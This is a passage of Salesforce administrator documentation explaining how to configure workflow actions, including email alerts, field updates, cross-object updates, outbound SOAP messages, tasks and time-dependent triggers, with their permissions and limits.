associates the default workflow user with a workflow rule if the user who initiated the rule is no longer active.

1. To add an immediate workflow action, click Add Workflow Action in the Immediate Workflow Actions section and
select:

• New Task to create a task to associate with the rule
• New Email to create an email alert to associate with the rule
• New Field Update to define a field update to associate with the rule
• New Outbound Message to define an outbound message to associate with the rule
• Select Existing Action to select an existing action to associate with the rule

2. To add a time-dependent workflow action, click Add Time Trigger in the Time-Dependent Workflow Actions section
and:

a. Specify a number of days or hours before or after a date relevant to the record, such as the date the record was created
or modified. If the workflow rule is in effect when this time occurs, the time trigger fires the workflow action.

b. Click Save.

Note:  The Add Time Trigger button is unavailable if:

• The evaluation criteria is set to Evaluate the rule when a record is: created, and every
time it’s edited

• The rule is activated
• The rule is deactivated but has pending actions in the workflow queue

3. Configure additional immediate or time-dependent actions.
4. Click Done.
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Note: For all custom objects and some standard objects, you can create workflow and approval actions where a change
to a detail record updates a field on the related master record. Cross-object field updates work for custom-to-custom
master-detail relationships, custom-to-standard master-detail relationships, and a few standard-to-standard
master-detail relationships. For more information, see Understanding Cross-Object Field Updates on page 3125.

See Also:
Configuring Rule Settings and Criteria
Creating Workflow Rules

Creating Email Alerts for Workflow, Approvals, or Milestones

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To create or change workflow rules:

“Customize Application”To create or change email alerts:

To create email alerts:

1. For workflow and approvals, click Create > Workflow & Approvals > Email Alerts.

For milestones on entitlement processes, from Setup, click Customize > Entitlement Management > Entitlement
Processes, choose an entitlement process, a milestone, and click Add Workflow Action.

2. Click New Email Alert.
3. Configure the email alert:

a. Enter a description.
b. Enter a unique name to refer to this component in the API. The requirement for uniqueness is only within the selected

object type. You can have actions of the same type with the same unique name, provided they are defined for different
objects. The Unique Name field can contain only underscores and alphanumeric characters. It must be unique within
the selected object type, begin with a letter, not include spaces, not end with an underscore, and not contain two
consecutive underscores.

c. If available, choose the object for this email alert.

Salesforce uses this object when generating merge field values for email templates with workflow rules and approval
processes. Also, you can define the recipients of this email alert using contact and user lookup fields that are relevant
to that object. For example, if you select Contract, you can define the contract signer as a recipient. The object is
read-only if the new email alert is associated with an approval process or workflow rule for a particular object.

Tip:  To create workflow rules for case comments so that comments added to cases send email alerts when a
rule is triggered, select Case Comment in the Object drop-down list when creating a new workflow rule.

d. Choose an email template.
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Note: If the email template you choose contains approval merge fields named
{!ApprovalRequest.field_name}, these fields will return values only when that email template is used
as the approval assignment template. If you use the template for any other email alert action—in either workflow
rules or approval processes—the merge fields will return a null value.

e. If available, select Protected Component to mark the alert as protected if it is part of a Managed - Released package.
f. Select who should receive this email alert. Depending on your organization settings and the object you selected, some

options in this list may not be available.

• Account Owner—The user listed as the account owner of either the account itself or the account associated with
the record. This option only works for email alerts on accounts, opportunities, cases, contacts, contracts, and any
custom object that is a child of the account object. Also, the associated account must have an account owner specified.
If you select another object type or the associated account doesn't have an account owner, Salesforce sends the email
alert to the record owner instead.

• Account Team—All users assigned to a particular account team role.

Note:  The Account Team option is always available; however, emails are only sent when the rule is
associated with the account object or any of its immediate child objects.

• Case Team—All users assigned to a particular case team role.
• Creator—The user who created the record.
• Customer Portal User—All users associated with a Customer Portal.
• Email Field—An email address field on the selected object, such as the Email field on lead records or custom

email fields.

Note:  When creating email alerts for campaign members, Email Field refers to the email field on the
lead or contact that the campaign member is based on.

• Owner—The record owner.
• Partner User—All users associated with a partner portal.
• Portal Role—All users assigned to a particular portal role.
• Portal Role and Subordinates—All users assigned to a particular portal role, plus all users in roles below

that role.
• Public Groups—The users in a particular public group.
• Related Contact—An associated contact on the record. For example, you can select the Customer Signed

By field for contracts that contain the name of the contract signer.
• Related Lead or Contact Owner—A campaign member's lead or contact owner.
• Related User—An associated user on the record. For example, contract records have an Activated By field

that contains the name of the user that activated the contract.
• Role—All of the users assigned a particular role.
• Role and Internal Subordinates—All users in a particular role, plus all users in roles below that role,

excluding partner portal and Customer Portal users.
• Role and Subordinates—All users in a particular role, plus all users in roles below that role.
• User—A particular user.
• Opportunity Team—All users assigned to a particular opportunity team role. This option appears only when

team selling is enabled.
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Note:  The Opportunity Team option only works for email alerts configured for opportunities. It doesn't
work for email alerts configured for child objects of opportunities.

g. Select the recipients who should receive this email alert in the Available Recipients list and click Add.

Note:  If you change the object after selecting recipients, Salesforce clears the Selected Recipients list.

h. Enter up to five additional email addresses.
i. You can change the From Email Address to:

• The email address of the default workflow user.
• A previously configured and verified organization-wide address. This allows you to use a standard global email

address for your organization (such as support@company.com) instead of the default From field, which is the
email address of the person who updates the record.

Only verified organization-wide email addresses display in the From Email Address picklist.

Note:  If you select Make this the default From email address for this object's email alerts, it overrides the
From Email Address for all email alerts associated with that object. You can still customize individual
email alerts to use a different From Email Address.

j. Click Save.

Note:  If your email recipient is a record owner and the owner of the record is a queue, the queue email receives
the email alert. If the queue is set up so that email is sent to all members, queue members are notified as well. If
no queue email is specified, only queue members are notified.

4. To put email alerts into action, associate them with a workflow rule, approval process, or entitlement process.

Note: The daily limit for emails sent from workflow and approval-related email alerts is 1,000 per standard Salesforce
license per organization. The overall organization limit is 2,000,000. When the daily limit is reached, a warning email
goes out to the default workflow user. If the default workflow user isn't set, then the warning email is sent to an active
system administrator.

See Also:
Managing Email Alerts
Workflow Daily Email Limit
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Defining Field Updates

Available in: Enterprise, Unlimited, Developer, and Database.com Editions.

Approvals are not available in Database.com.

User Permissions Needed

“Customize Application”To define, edit, or delete field updates:

Field updates allow you to automatically specify a field value. Field updates are actions associated with workflow rules, approval
processes, or entitlement processes. Before you begin, review Field Update Considerations on page 3127.

Note: For all custom objects and some standard objects, you can create workflow and approval actions where a change
to a detail record updates a field on the related master record. Cross-object field updates work for custom-to-custom
master-detail relationships, custom-to-standard master-detail relationships, and a few standard-to-standard
master-detail relationships. For more information, see Understanding Cross-Object Field Updates on page 3125.

1. From Setup, click Create > Workflow & Approvals > Field Updates.

For milestones on entitlement processes, from Setup, click Customize > Entitlement Management > Entitlement
Processes, choose an entitlement process, a milestone, and click Add Workflow Action.

2. Click New Field Update.
3. Configure the field update.

a. Enter a name for this field update.
b. Enter a unique name to refer to this component in the API. The requirement for uniqueness is only within the selected

object type. You can have actions of the same type with the same unique name, provided they are defined for different
objects. The Unique Name field can contain only underscores and alphanumeric characters. It must be unique within
the selected object type, begin with a letter, not include spaces, not end with an underscore, and not contain two
consecutive underscores.

c. Enter a description.
d. Define the field update, including the object associated with the workflow rule or approval process, and the field to

update. Note that the field to update may be on a related object in a master-detail relationship. Fields are shown only
for the target object that you select.

Note: You can use field updates on encrypted custom fields, but if you try to use a formula to set the new
value, the encrypted field isn't available in the formula editor.

e. If available, check the Protected Component check box to mark the field update as protected.
f. Select the Re-evaluate Workflow Rules After Field Change checkbox if you want workflow rules on this

object to be re-evaluated after the field value is updated. For more information, see Field Updates That Re-evaluate
Workflow Rules on page 3126.

g. Specify the new field value. The available options depend on the type of field you are updating. You can:

• Choose A specific value, and enter the value in the space provided.
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• Choose A blank value (null) if you want Salesforce to remove any existing value and leave the field blank. This
option isn't available for required fields, checkboxes, and some other types of fields.

• For record owners, choose the user to whom the record should be assigned. For case, lead, and custom object records,
you can also choose a queue for this field. Select Notify Assignee to send an email to the new record owner.

• For checkboxes, choose True to select the checkbox and False to deselect it.
• For picklists, select a specific value from the drop-down list, or select the value above or below the current value

based on the sorting specified in the picklist definition. If you sort values alphabetically, the values above or below
may be different for users in other languages.

• Choose Use a formula to set the new value to calculate the value based on an expression, merge fields, or other
values.

◊ If you’re building a formula for approvals or rules, such as workflow, validation, assignment, auto-response, or
escalation, click Insert Field, choose a field, and click Insert.

◊ To insert case merge fields so that email messages update the associated case fields, click Insert Field on the
Rule Criteria section and choose Email Message > Parent Case.

◊ To insert an operator, choose the appropriate operator icon from the Insert Operator drop-down list.
◊ You can insert a function from the Functions list. Functions are pre-built formulas that you can customize with

your input parameters. See Formula Operators and Functions for a description of each operator and function.

h. Click Save.

Tip: To create workflow rules so that case comments or emails automatically update fields on associated cases,
select Case Comment or Email Message in the Object drop-down list when creating a new workflow rule and
select Case in the Field to Update list. Email-to-Case or On-Demand Email-to-Case must be enabled for your
organization to use the Email Message in a workflow rule.

When cases are updated by an email-triggered workflow rule, the updated case can trigger:

• Workflow rules
• Validation rules
• Updates to roll-up summary fields
• Escalation rules
• Apex triggers
• Entitlement processes

The updated case can't trigger:

• Assignment rules
• Auto-response rules
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Understanding Cross-Object Field Updates

Available in: Enterprise, Unlimited, Developer, and Database.com Editions

Approval Processes are not available in Database.com

For all custom objects and some standard objects, you can create workflow and approval actions where a change to a detail
record updates a field on the related master record. Cross-object field updates work for custom-to-custom master-detail
relationships, custom-to-standard master-detail relationships, and a few standard-to-standard master-detail relationships. For
example, in a custom recruiting application, create a workflow rule that sets the status of an application (the master object) to
“Closed” when a candidate (the detail object) accepts the job. Or, for standard objects, create a rule to change the status of a
case from “Awaiting Customer Response“ to “In Progress” when a customer adds a case comment.

Note: The cross-object field update function may depend on certain critical updates being active. From Setup, click
Critical Updates to see if your organization requires any updates.

Custom Object to Custom Object

You can use cross-object field updates for all custom objects that are children of custom objects in a master-detail relationship.

Custom Object to Standard Object

You can use cross-object field updates for custom objects that are children of certain standard objects in a master-detail
relationship. The standard objects which support cross-object field updates from custom objects are:

• Account
• Asset
• Campaign
• Case
• Contact
• Contract
• Contract Line Item
• Entitlement
• Opportunity
• Order
• Question
• Quote
• Service Contract
• Solution

Standard Object to Standard Object

You can use cross-object field updates for standard objects that are children of standard objects in a master-detail relationship.
However, only a few standard-to-standard relationships are supported:

• Case Comments updating Case
• Email updating Case
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Tip: To create workflow rules so that case comments or emails automatically update fields on associated cases,
select Case Comment or Email Message in the Object drop-down list when creating a new workflow rule and
select Case in the Field to Update list. Email-to-Case or On-Demand Email-to-Case must be enabled for your
organization to use the Email Message in a workflow rule.

• Opportunity Product updating Opportunity

Note:  Cross-object field updates to a parent opportunity's Amount and Quantity fields only work if the
opportunity has no opportunity products associated with it.

• Opportunity updating Account—Supported for both business accounts and person accounts.

Note: If you have workflow rules on converted leads and want to use cross-object field updates on the resulting
accounts and opportunities, you must enable the lead setting Enable Validation and Triggers from Lead
Convert.

When configuring standard-to-standard cross-object field updates, consider that:

• Standard-to-standard cross-object field update actions can’t be used in, or assigned to, approval processes.
• A standard-to-standard cross-object field update can still update a parent record even if the user doesn’t have edit access

to it.

Note:  If you have Apex code in place that’s updating parent fields in the same relationships supported by cross-object
field updates, consider leveraging the functionality of the standard cross-object field updates and then removing your
Apex code. Otherwise, both will fire, and since workflow rules run after Apex triggers, the workflow field update will
override any change made by your Apex code.

See Also:
Defining Field Updates
Field Update Considerations
Overview of Object Relationships

Field Updates That Re-evaluate Workflow Rules

Available in: Enterprise, Unlimited, Developer, and Database.com Editions.

Selecting the Re-evaluate Workflow Rules After Field Change checkbox on the Field Update Edit page allows
you to set a workflow field update to re-evaluate all workflow rules on the object if the field update results in a change to the
value of the field.

• If the field update changes the field’s value, all workflow rules on the associated object are re-evaluated. Any workflow
rules whose criteria are met as a result of the field update will be triggered.

• If any of the triggered workflow rules result in another field update that’s also enabled for workflow rule re-evaluation, a
domino effect occurs, and more workflow rules can be re-evaluated as a result of the newly-triggered field update. This
cascade of workflow rule re-evaluation and triggering can happen up to five times after the initial field update that started
it.
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• Make sure that your workflow rules aren’t set up to create recursive loops. For example, if a field update for Rule1 triggers
Rule2, and a field update for Rule2 triggers Rule1, the recursive triggers may cause your organization to exceed its limit
for workflow time triggers per hour.

• In a batch update, workflow is only retriggered on the entities where there is a change.
• Only workflow rules on the same object as the initial field update will be re-evaluated and triggered.
• Only workflow rules that didn’t fire before will be retriggered.
• Cross-object workflow rules aren’t candidates for re-evaluation.
• Cross-object field updates that cause a field value to change don’t trigger workflow rule re-evaluation on the associated

object.
• An approval process can specify a field update action that re-evaluates workflow rules for the updated object. If, however,

the re-evaluated workflow rules include a cross-object field update, those cross-object field updates will be ignored.

See Also:
Defining Field Updates
Field Update Considerations

Field Update Considerations

Available in: Enterprise, Unlimited, Developer, and Database.com Editions

Approval Processes, Opportunities, and Contracts are not available in Database.com

User Permissions Needed

“Customize Application”To define, edit, or delete field updates:

When creating field updates for workflow rules or approval processes, consider the following:

Field Update Processing

• Field updates occur before email alerts, tasks, and outbound messages.
• Field updates occur after case assignment, lead assignment, auto-response, and case escalation rules.
• Field updates function independently of field-level security. Therefore, a workflow rule can update fields even though they

are hidden on the user's page layout.
• The result of a field update is unpredictable when a single workflow rule includes multiple field updates that apply different

values to the same field.
• Field updates may affect the information in a related list. For example, if a field such as the Amount or Close Date of

an opportunity is set to be updated, it will affect the Stage History related list on opportunities.
• If a user gets a field update error when saving a record, you can use the debug log to see which field update failed. The

debug log stops when a failure occurs.
• For reminder fields on tasks and events:

◊ Field updates can set the reminder for a task or event but they can't use the due date of a task or the scheduled time of
an event.
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◊ Formulas for date/time values are calculated in days. Divide the value by 1440—the number of minutes in a day—to
express the value in minutes. For example, the formula Now()-7 means seven days ago, while Now()-7/1440 means
seven minutes ago.

• If your organization uses multiple currencies, currency fields are updated using the record's currency. If you choose to
update a field based on a formula, any values in your formula are interpreted in the currency of the record.

• Field updates are tracked in the History related list if you have set history tracking on those fields.
• Because updates to records based on workflow rules don’t trigger validation rules, workflow rules can invalidate previously

valid fields.
• If you have person accounts enabled, you can use the Is Person Account field as part of the evaluation criteria for

workflow rules. However, because the Is Person Account field is read-only, any field updates set up to modify it will
fail.

Tip: Salesforce processes rules in the following order:

1. Validation rules
2. Assignment rules
3. Auto-response rules
4. Workflow rules (with immediate actions)
5. Escalation rules

Notes on Cross-Object Field Updates

• For all custom objects and some standard objects, you can create workflow and approval actions where a change to a detail
record updates a field on the related master record. Cross-object field updates work for custom-to-custom master-detail
relationships, custom-to-standard master-detail relationships, and a few standard-to-standard master-detail relationships.
For more information, see Understanding Cross-Object Field Updates on page 3125.

• The cross-object field update function may depend on certain critical updates being active. From Setup, click Critical
Updates to see if your organization requires any updates.

• Field update actions that update fields on related objects are supported only for use with workflow rules. Approval processes
can't use cross-object field update actions.

• An approval process can specify a field update action that re-evaluates workflow rules for the updated object. If, however,
the re-evaluated workflow rules include a cross-object field update, those cross-object field updates will be ignored.

Field Updates and Custom Fields

• Before changing a custom field’s type, make sure that it isn’t the target of a workflow field update or referenced in a field
update formula that would be invalidated by the new type.

• You can't delete a custom field that is referenced by a field update.
• You can use field updates on encrypted custom fields, but if you try to use a formula to set the new value, the encrypted

field isn't available in the formula editor.

Field Updates on Opportunities and Contracts

• You can define field updates for the Stage field on opportunities, but be aware of how this field affects the Type and
Forecast Category fields.

• You can define field updates using the Amount field on opportunities but it will only apply to those opportunities that
don't have products. Adding products to an opportunity changes the Amount field to a read-only field that is automatically
calculated and not affected by that field update.

• You can define field updates for the Status field on contracts. However, the value of this field may affect the value of the
Status Category field as well.
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Note: The Status field cannot be updated by approval processes. If you want to use the contract status as part
of an approval process, we recommend creating a custom status field.

• Avoid creating a field update for contracts or orders that changes the Status field to any value other than Approved.

Field Update Limitations

• The results of a field update can't trigger additional rules such as validation, assignment, auto-response, or escalation rules.
• The results of a field update can trigger additional workflow rules if you have flagged the field update to do so. For more

information, see Field Updates That Re-evaluate Workflow Rules on page 3126.
• Read-only fields like formula or auto-number fields aren't available for field updates.
• The Language picklist field on multilingual solutions isn't available for field updates.
• Email message workflow rules can only be associated with field updates.
• If a field update references a specific user, you can't deactivate that user. For example, if your field update is designed to

change the owner of a record to Bob Smith, change the field update before deactivating Bob Smith.
• Some fields, such as Related To and Private fields on activities, aren't available for field updates.
• You can update long text area fields, but the option to insert A specific value restricts you to entering up to 255

characters.
• You can't make a field universally required if it's used by a field update that sets the field to a blank value.
• Workflow rules that update owners do not also transfer associated items. To ensure transfer, click Change next to the

owner’s name in a record and make your transfer selections.

See Also:
Defining Field Updates
Understanding Cross-Object Field Updates

Defining Outbound Messages

Available in: Enterprise, Unlimited, Developer, and Database.com Editions

Approvals are not available in Database.com

User Permissions Needed

“Customize Application”

AND

“Manage Translation”

AND

“Manage Territories” (if territories are enabled)

To define, edit, or delete outbound messages:

An outbound message is a workflow, approval, or milestone action that sends the information you specify to an endpoint you
designate, such as an external service. An outbound message sends the data in the specified fields in the form of a SOAP
message to the endpoint.

3129

Creating Workflow RulesEnhancing Your Business Processes



When you associate an outbound message with a workflow rule, approval process, or entitlement process, the outbound message
sends the selected information to the associated endpoint URL when the workflow rule or approval process is triggered.  Once
the endpoint URL receives the message, it can take the information from the message and process it, assuming that the Web
service has been configured appropriately.

For security reasons, Salesforce restricts the outbound ports you may specify to one of the following:

• 80: This port only accepts HTTP connections.

• 443: This port only accepts HTTPS connections.

• 1024–66535 (inclusive): These ports accept HTTP or HTTPS connections.

To define outbound messages:

1. For workflow and approvals, click Create > Workflow & Approvals > Outbound Messages.

For milestones on entitlement processes, from Setup, click Customize > Entitlement Management > Entitlement
Processes, choose an entitlement process, a milestone, and click Add Workflow Action.

2. Click New Outbound Message.

Note:  If you don't have this option, your organization doesn't have outbound messages enabled. Contact
salesforce.com to enable outbound messages.

3. Choose the object that has the information you want included in the outbound message, and click Next.

Tip:  To create workflow rules for case comments so that comments added to cases send outbound messages when
a rule is triggered, select Case Comment in the Object drop-down list when creating a new workflow rule.

4. Configure the outbound message.

a. Enter a name for this outbound message.
b. Enter a unique name to refer to this component in the API. The requirement for uniqueness is only within the selected

object type. You can have actions of the same type with the same unique name, provided they are defined for different
objects. The Unique Name field can contain only underscores and alphanumeric characters. It must be unique within
the selected object type, begin with a letter, not include spaces, not end with an underscore, and not contain two
consecutive underscores.

c. Enter a description.
d. Enter an endpoint URL for the recipient of the message. Salesforce sends a SOAP message to this endpoint.
e. Select the Salesforce user to use when sending the message. The chosen user controls data visibility for the message

that is sent to the endpoint.
f. Check the Protected Component check box to mark the outbound message as protected.
g. Select Send Session ID if you want the Salesforce session ID included in the outbound message. Include the session

ID in your message if you intend to make API calls and you don't want to include a username and password. Never
send a username and password in an unencrypted message, especially in a production environment. It isn’t secure.

h. Select Add failures to failed outbound message related list if you want this message to move to
the failed outbound messages related list after all retries have been attempted. If you don't see this option, failed outbound
message notifications aren't enabled for your organization. Contact your salesforce.com representative.

i. Select the fields to include in the outbound message and click Add.

5. Click Save, and review the outbound message detail page:
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• The API Version field is automatically generated and set to the current API version when the outbound message
was created. This API version is used in API calls back to Salesforce using the enterprise or partner WSDLs. The API
Version can only be modified by using the Metadata API.

• Click the Click for WSDL link to view the WSDL associated with this message.

The WSDL is bound to the outbound message and contains the instructions about how to reach the endpoint service
and what data is sent to it.

6. If your endpoint uses a client certificate:

a. From Setup, click Develop > API.
b. Click Generate Client Certificate.
c. Save the certificate to the appropriate location.
d. Import the downloaded certificate into your application server and configure your application server to request the

client certificate.

7. To put outbound messages into action, associate them with a workflow rule, approval process, or entitlement process.

See Also:
Tracking Outbound Message Delivery Status
Web Services API Developer's Guide

Outbound Message Notifications

Available in: Enterprise, Unlimited, Developer, and Database.com Editions

Approvals are not available in Database.com

User Permissions Needed

“Customize Application”To view or edit outbound message notification settings:

You can request that up to five users receive a notification listing all outbound messages that have failed for at least 24 hours.
A fresh notification is sent every 24 hours until you cancel the request.

Failed messages are deleted from the failed outbound messages related list after seven days. Before they are removed, you can
delete them yourself or request that they be retried again.

To view the current outbound message notification requests, from Setup, click Monitoring > Outbound Message Notifications.

You can perform several tasks here:

• Edit a notification.

• Delete a notification. Since you can only create five, you may need to delete one before you can create more.

• Create a new notification request.
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Note:  If you don't have this option, your organization doesn't have outbound messages enabled. Contact salesforce.com
to enable outbound messages.

Creating and Editing Outbound Message Notifications

Available in: Enterprise, Unlimited, Developer, and Database.com Editions

Approvals are not available in Database.com

User Permissions Needed

“Modify All Data”To view or edit outbound message notification settings:

You can request that up to five users receive a notification listing all outbound messages that have failed for at least 24 hours.
A fresh notification is sent every 24 hours until you cancel the request.

To create a notification request:

1. From Setup, click Monitoring > Outbound Message Notifications.
2. Click New.
3. Enter a full username, or click the icon to select it from a list of usernames.
4. Click Save to save the request, or Save & New to save this request and create a new one.

Note:  If you don't have this option, your organization doesn't have outbound messages enabled. Contact salesforce.com
to enable outbound messages.

Viewing Outbound Message Notification Requests

Available in: Enterprise, Unlimited, Developer, and Database.com Editions

User Permissions Needed

“Modify All Data”To view or edit outbound message notification settings:

You can request that up to five users receive a notification listing all outbound messages that have failed for at least 24 hours.
A fresh notification is sent every 24 hours until you cancel the request.

This page is displayed when you have saved a new notification request. You can:

• Click Edit to change the username for a notification request. This is simpler than deleting the request and then creating
a new one.

• Click Delete to delete the notification request.

• Click Clone to create a new notification request with the same username.
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Tracking Outbound Message Delivery Status

Available in: Enterprise, Unlimited, Developer, and Database.com Editions

Approvals and Milestone Actions are not available in Database.com

User Permissions Needed

“Modify All Data”To track outbound messages:

An outbound message is a workflow, approval, or milestone action that sends the information you specify to an endpoint you
designate, such as an external service. An outbound message sends the data in the specified fields in the form of a SOAP
message to the endpoint.

To track the status of an outbound message, from Setup, click Monitoring > Outbound Messages. Alternatively, click Create
> Workflow & Approvals > Outbound Messages, and then click View Message Delivery Status. Here you can view the
status of your outbound messages:

• The Next items for delivery related list contains all outbound messages that are awaiting delivery.

• The Oldest failures in queue related list contains the oldest failures that have not yet been deleted (because they have not
been delivered and are not 24 hours old).

• The Failed outbound messages related list contains all the outbound messages that failed to be delivered and are no longer
being retried. Messages are listed here only if you configure the message when you create it by selecting Add failures
to failed outbound message related list. If you do not see this related list, it has not been enabled for your
organization. Contact your salesforce.com representative.

You can perform several tasks here:

• Click Refresh to refresh the list.

• Click any workflow or approval process action ID to view the action that triggered it.

• Click Retry to change the Next Attempt date to now. This causes the message delivery to be immediately retried. If you
select Retry in the Failed outbound messages related list, the outbound message moves to the Next items for delivery
related list and is retried for another 24 hours.

• Click Del to permanently remove the outbound message from the queue.

Note:  If you don't have this option, your organization doesn't have outbound messages enabled. Contact salesforce.com
to enable outbound messages.
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Creating Tasks for Workflow, Approvals, or Milestones

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To create or change tasks:

“Customize Application”To create or change workflow rules:

To create your tasks:

1. For workflow and approvals, click Create > Workflow & Approvals > Tasks.

For milestones on entitlement processes, from Setup, click Customize > Entitlement Management > Entitlement
Processes, choose an entitlement process, a milestone, and click Add Workflow Action.

2. Click New Task.
3. Select a record type and click Next. Remember, tasks can only be associated with workflow rules or approval processes for

the same object type.

Note:  When creating tasks for custom objects, only custom objects that track activities are available.

Tasks aren't available for article types.

4. Configure the task:

a. Select an assignee. An assignee can be in the form of a user, role, record owner, record creator, opportunity team role,
or account team role, depending on the type of record you chose.

Note:

• If the assignee of a task is set to the record owner and the owner of a lead or case is a queue, the task is
assigned to the person who triggered the rule.

• If the subject was translated, Salesforce creates the task in the assignee's language If you checked Notify
Assignee for the task, Salesforce sends the email in the assignee's language. However, if only the comments
field was translated, Salesforce creates the task and sends the email in the language of the user who triggered
the task.

• If a custom object has a master-detail relationship with a standard object, the owner of the custom object
record is automatically set to the owner of the master standard object record. For example, if a custom
object called “Expenses” has a master-detail relationship with Accounts, the owner of each expense record
is the owner of the account for the expense.

• If the assignee of a workflow task is a role and more than one user belongs to that role, the record owner
becomes the task assignee, regardless of their role. We recommend that you do not assign tasks to roles
with multiple users. Assigning tasks to roles with one user allows you to easily change the user in that role
without modifying the workflow rule.

• When a lead is converted by someone who isn't the lead owner, all workflow tasks associated with the lead
that are assigned to that user, except email alerts, are reassigned to the lead owner. Workflow tasks assigned
to users other than the lead owner and lead converter aren't changed.
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b. Enter a subject for the task.
c. Enter a unique name to refer to this component in the API. The requirement for uniqueness is only within the selected

object type. You can have actions of the same type with the same unique name, provided they are defined for different
objects. The Unique Name field can contain only underscores and alphanumeric characters. It must be unique within
the selected object type, begin with a letter, not include spaces, not end with an underscore, and not contain two
consecutive underscores.

d. Choose a due date, status, and priority. Due dates appear in the time zone of the assignee.

Note: Configuring a task’s Due Date to “Rule Trigger Date” sets time triggers and workflow task due dates
based on the date that the workflow time trigger’s action is executed. For example, if the task due date is “Rule
Trigger Date plus 10 days” and the time trigger is executed on January 1st, Salesforce sets the task due date
to January 11th..

e. Check Notify Assignee to send an email notification when the task is assigned.
f. Check Protected Component to mark the task as protected.
g. Enter any comments to add to the task.
h. Click Save.

5. To put tasks into action, associate them with a workflow rule, approval process, or entitlement process.

Note:  You may notice that all your tasks include a Created By field. For tasks, this field contains the name of the
person who saved the record that triggered the rule to assign the task.

Time-Dependent Action and Time Trigger Considerations

Available in: Enterprise, Unlimited, Developer, and Database.com Editions

Leads are not available in Database.com

User Permissions Needed

“Customize Application”To define, edit, or delete time-dependent actions and time
triggers:

When creating time-dependent actions and time triggers for workflow rules, consider the following:

Defining Time Triggers

• When defining a time trigger, use standard and custom date and date/time fields defined for the object. Specify time using
days and hours.

• You can add actions to existing time triggers.

Time Trigger Processing

• Time-dependent actions aren't executed independently. They're processed several times every hour, where they're grouped
together and executed as a single batch. Therefore, any triggers that fire as a result of those grouped actions are also executed
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in a single batch. This behavior can cause you to exceed your Apex governor limits if you design your time-based workflow
in conjunction with Apex triggers.

• Salesforce evaluates time-based workflow on the organization's time zone, not the users'. Users in different time zones
may see differences in behavior.

• Salesforce doesn't necessarily execute time triggers in the order they appear on the workflow rule detail page. Workflow
rules list time triggers that use the Before field first, followed by time triggers that use the After field.

• Salesforce doesn't display time-dependent action controls on the workflow rule edit page if you set the workflow rule
evaluation criteria to Evaluate the rule when a record is: created, and every time it’s edited.

• If you change a date field that is referenced by an unfired time trigger in a workflow rule that has been evaluated, Salesforce
recalculates the unfired time triggers associated with the rule. For example, if a workflow rule is scheduled to alert the
opportunity owner seven days before the opportunity close date and the close date is set to 2/20/2011, Salesforce sends the
alert on 2/13/2011. If the close date is updated to 2/10/2011 and the time trigger hasn't fired, Salesforce reschedules the
alert for 2/3/2011. If Salesforce recalculates the time triggers to a date in the past, Salesforce triggers the associated actions
shortly after you save the record.

• If a workflow rule has a time trigger set for a time in the past, Salesforce queues the associated time-dependent actions to
execute sometime within the hour, depending on system usage. For example, if a workflow rule on opportunities is configured
to update a field seven days before the close date, and you create an opportunity record with the close date set to today,
Salesforce updates the field within an hour after you create the opportunity.

• Time-dependent actions remain in the workflow queue only as long as the workflow rule criteria are still valid. If a record
no longer matches the rule criteria, Salesforce removes the time-dependent actions queued for that record.

For example, an opportunity workflow rule may specify:

◊ A criteria set to “Opportunity: Status not equals to Closed Won, Closed Lost.”
◊ An associated time-dependent action with a time trigger set to seven days before the opportunity close date.

If a record that matches the criteria is created on July 1st and the Close Date is set to July 30th, the time-dependent
action is scheduled for July 23rd. However, if the opportunity is set to “Closed Won” or “Closed Lost” before July 23rd,
the time-dependent action is automatically removed from the queue.

• Salesforce ignores time triggers that reference null fields.
• Time-dependent actions can automatically be queued again if the record is updated and the evaluation criteria is set to

Evaluate the rule when a record is: created, and any time it’s edited to subsequently
meet criteria. Using the previous example, if the opportunity status is changed from Closed Lost to Prospecting and
the workflow rule evaluation criteria is Evaluate the rule when a record is: created, and any time
it’s edited to subsequently meet criteria, Salesforce reevaluates the time triggers and adds the appropriate
actions to the workflow queue.

• Deleting a record that has pending actions removes the pending actions from the workflow queue. You can't restore the
actions, even if you undelete the record.

• If the evaluation criteria is set to Evaluate the rule when a record is: created, the workflow rule evaluates
its time triggers only once. If the record that fired the rule changes to no longer meet the evaluation criteria, Salesforce
removes the pending actions from the queue and never reapplies the rule to the record.

• You can deactivate a workflow rule at any time. If the rule has pending actions in the workflow queue, editing the record
that triggered the rule removes the pending actions from the queue. If you don't edit the record, the pending actions are
processed even though the rule has been deactivated.

• Time-based workflow rules aren't reevaluated if an Apex post trigger which is executed as a result of a workflow rule or
approval process updates a field so its value no longer meets the time-based workflow rule criteria.

• Configuring a task’s Due Date to “Rule Trigger Date” sets time triggers and workflow task due dates based on the date
that the workflow time trigger’s action is executed. For example, if the task due date is “Rule Trigger Date plus 10 days”
and the time trigger is executed on January 1st, Salesforce sets the task due date to January 11th..

• You can add a new active workflow rule with time triggers in a change set and deploy it. You can only change time triggers
on a workflow rule in a change set if it's inactive. The rule must be activated in the destination organization manually or
through another change set that only activates workflow rules and makes no time trigger changes.
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For example, if you have an inactive workflow rule in your destination organization and your change set contains an active
workflow rule with the same name and new or different time triggers, the deployment will fail because it will activate the
workflow rule first, then try to add or remove time triggers.

Note:  Time-dependent actions must be added manually when including a workflow rule in a change set. The
View/Add Dependencies function doesn’t detect time-dependent actions.

Using Time-Dependent Workflow with Leads

• You can't convert a lead that has pending actions.
• If Validation and Triggers from Lead Convert is enabled, existing time-based workflow actions on leads aren't triggered

during lead conversion.
• If a campaign member based on a lead is converted prior to the completion of time-based workflow actions associated with

it, Salesforce still performs the time-based workflow actions.

Limitations

• Time triggers don't support minutes or seconds.
• Time triggers can't reference the following:

◊ DATE or DATETIME fields containing automatically derived functions, such as TODAY or NOW.
◊ Formula fields that include related-object merge fields.

• Salesforce limits the number of time triggers an organization can execute per hour. If an organization exceeds the limits
for its Edition, Salesforce defers the execution of the additional time triggers to the next hour. For example, if an Unlimited
Edition organization has 1,200 time triggers scheduled to execute between 4:00 PM and 5:00 PM, Salesforce processes
1,000 time triggers between 4:00 PM and 5:00 PM and the remaining 200 time triggers between 5:00 PM and 6:00 PM.

• You can't archive a product or price book that has pending actions.
• You can't add or remove time triggers if:

◊ The workflow rule is active.
◊ The workflow rule is deactivated but has pending actions in the queue.
◊ The workflow rule evaluation criteria is set to Evaluate the rule when a record is: created, and

every time it’s edited.
◊ The workflow rule is included in a package.

See Also:
Configuring Workflow Actions
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Selecting Existing Actions

Available in: Enterprise, Unlimited, Developer, and Database.com Editions

Approvals are not available in Database.com

User Permissions Needed

“Customize Application”To select existing actions:

